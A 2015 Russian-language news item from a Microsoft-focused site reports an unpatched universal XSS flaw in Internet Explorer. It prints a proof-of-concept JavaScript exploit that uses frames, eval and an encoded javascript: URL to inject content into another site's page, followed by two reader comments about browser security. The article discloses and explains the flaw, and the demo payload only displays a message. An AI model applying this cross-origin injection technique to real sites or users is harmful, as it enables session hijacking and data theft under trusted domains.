Вы зашли как: Гость
Опрос
Верите ли вы в скорый выход Surface Andromeda?

В Internet Explorer обнаружена новая XSS-уязвимость

Напечатать страницу
04.02.2015 17:20 | Avanzato

Сегодня появилась информация об обнаружении новой XSS-уязвимости в браузере Internet Explorer, которая позволяет злоумышленнику выполнять произвольный JavaScript код в браузере жертвы в контексте безопасности произвольного сайта. Таким образом может быть использован доверенный сайт, вроде сайта Microsoft или Google.

Для использования этой уязвимости, которая пока не имеет способов для устранения, необходимо, чтобы пользователь зашел на сайт с определенным кодом и перешел по ссылке на сайт в контексте которого и будет исполнен сценарий.

После того, как пользователь нажмет на ссылку и выполнится код приведенный ниже, пользователь перейдет на сайт msinsider.ru и получит сообщение "Hacked by XAKEP". Данная надпись будет сформирована сценарием не от имени сайта на котором находилась ссылка и данный код, а от имени сайта msinsider.ru, который возможно является доверенным сайтом в вашем браузере.





Вот пример кода:

function go() { w=window.frames[0]; w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Close this window after 3 seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20XAKEP%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.msinsider.ru%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1); } setTimeout("go()",1000);

Комментарии

Не в сети

Ох уж этот дырявый осёл. Как же он опротивел за столько лет...

05.02.15 07:21
0
unihorn -145
Не в сети

Ты лучше посмотри на эти дырявые Лис и Хром. Которые давно по этому признаку перегнали Ослик (причем глобально).

Да, мелкие могут долго тянуть с собственными исправлениями дырок (и это, некоторые, пытаются выставить как - "ВОТ ВИДИТЕ СТОРОННИЕ БРАУЗЕРЫ И ПРОДУКТЫ ВСЕ РАВНО ЛУЧШЕ." )... Но, в этом случае, всегда есть армия сторонних решений (от секьюрити софта, до, ты не поверишь, НЕОФИЦИАЛЬНЫХ патчей).

Итого. Даже с учетом, долгого исправления некоторых уязвимостей (далеко не всегда заметим, ибо в этом случае больше громких публикаций ОПОфилов и сочувствующих чем дырок); ослик САМЫЙ БЕЗОПАСНЫЙ БРАУЗЕР В МИРЕ (ибо даже в случае долгих исправлений есть масса сторонних защитников и исправляльщиков избавляющих юзера от проблем с данной "долгой не исправляющейся уязвимостью").

Посему Роман успокойся уже.

05.02.15 14:44
0
Для возможности комментировать войдите в 1 клик через

По теме

Акции MSFT
103.2 -0.2
Акции торгуются с 17:30 до 00:00 по Москве
Мы на Facebook
Мы ВКонтакте
Сравнить цены на ноутбуки в Киеве.
В сервисе IPANN.NET купить прокси для SEO и SMM
Все права принадлежат © MSInsider.ru (ex TheVista.ru), 2017
Сайт является источником уникальной информации о семействе операционных систем Windows и других продуктах Microsoft. Перепечатка материалов возможна только с разрешения редакции.
Работает на WMS 2.34 (Страница создана за 0.171 секунд (Общее время SQL: 0.143 секунд - SQL запросов: 35 - Среднее время SQL: 0.0041 секунд))